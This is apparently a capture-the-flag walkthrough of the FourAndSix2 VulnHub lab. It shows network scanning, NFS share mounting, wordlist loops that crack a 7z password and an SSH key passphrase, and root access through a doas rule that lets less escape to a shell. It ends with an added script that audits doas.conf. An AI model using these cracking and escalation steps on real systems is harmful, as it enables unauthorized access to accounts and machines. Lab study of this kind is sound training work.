Author: mobiledu2502921883 | Source: Internet | 2023-07-24 16:48
Today I will exploit the vulnerable image called "FourAndSix2". The image can be downloaded from https://www.vulnhub.com/entry/fourandsix-201,266/. Once it is downloaded, we need to import it into VMware.
Now here we go.
# step1 start Metasploit
```
>> msfconsole
```
# step2 scan ports
```
msf>> db_nmap 192.168.30.1/24
msf>> db_nmap 192.168.30.93
```
# step3 exploit
Reviewing the scan results, we found that the target has an NFS vulnerability.
```
msf>> search nfs
msf>> use ....
msf>> apt install nfs-common
msf>> mkdir /nfstest
msf>> mount -t nfs 192.168.30.93:/home/user/storage /nfstest -o nolock
msf>> cp /nfstest/backup.7z ~/vulnhub/fourandsix2
```
We then found that backup.7z is password protected, so we uploaded it to https://www.lostmypass.com/ to get the password.
# step4 crack id_rsa
We found id_rsa and id_rsa.pub, but we can't use id_rsa to log in directly. We need to crack the id_rsa passphrase first.
```
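# On a correct guess, ssh-keygen -p rewrites the key so its passphrase becomes "password"
cat /usr/share/wordlists/rockyou.txt | while IFS= read -r line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo "$line"; break; fi; done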
```
Now we have the password: 12345678
# step5 login with id_rsa
```
ssh -i id_rsa user@192.168.30.93
```
# step6 find vulnerability for Privilege Escalation
```
>> find / -perm -u=s -type f 2>/dev/null
fourandsix2# cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
>> doas /usr/bin/less /var/log/authlog
# inside less, press the v key to switch to vi mode, then enter !sh
```
Finally, we got the flag: acd043bc3103ed3dd02eee99d5b0ff42
Here are the two shell one-liners used to crack the 7z password and the id_rsa passphrase:
```
# Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt | while IFS= read -r line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo "$line"; break; fi; done
cat /usr/share/wordlists/rockyou.txt | while IFS= read -r line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo "$line"; break; fi; done
```
magic command...
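The doas.conf rule in step 6 lets `user` run `less` as root without a password, and `less` can start an editor and a shell from inside its own UI. As an added example (not part of the original write-up), this shell function audits a doas.conf for rules of that kind; the function name `audit_doas`, the `RISKY` list and the third sample rule are assumptions of the example.

```sh
#!/bin/sh
# Added example: flag doas.conf rules that hand out a root shell indirectly.
# RISKY is an illustrative, non-exhaustive list (assumption of this example)
# of programs that can start an editor or shell from inside their own UI.
RISKY="less more vi vim view ed man"

# audit_doas: doas.conf text on stdin, one finding per risky rule on stdout.
# Simplified parser: one rule per line, tokens separated by whitespace.
audit_doas() {
    n=0
    while read -r action rest; do
        n=$((n + 1))
        if [ "$action" != permit ]; then continue; fi
        id="" cmd="" mods="" prev="" inenv=0 risk=""
        set -f                          # no globbing while splitting the rule
        for w in $rest; do
            if [ "$inenv" -eq 1 ]; then # skip the setenv { ... } block
                if [ "$w" = "}" ]; then inenv=0; fi
            elif [ "$prev" = cmd ]; then
                cmd=$w
            else
                case $w in
                    "{") inenv=1 ;;
                    nopass|keepenv) mods="$mods,$w" ;;
                    nolog|persist|setenv|as|cmd) ;;
                    args) break ;;      # the rest are command arguments
                    *) id=${id:-$w} ;;  # first plain word is the identity
                esac
            fi
            prev=$w
        done
        set +f
        if [ "$id" = root ]; then continue; fi   # root gains nothing new
        if [ -z "$cmd" ]; then
            risk=any-command
        else
            case " $RISKY " in *" ${cmd##*/} "*) risk=shell-escape ;; esac
        fi
        if [ -n "$risk" ]; then
            echo "line $n: $id -> ${cmd:-ANY}: $risk$mods"
        fi
    done
    return 0
}

# Constructed sample: the two rules shown in step 6 plus one narrow rule.
SAMPLE='permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
permit nopass operator as root cmd /sbin/reboot'
printf '%s\n' "$SAMPLE" | audit_doas
```

Only the `less` rule is reported; pinning `args` does not help, because the escape happens inside the program after it has started as root.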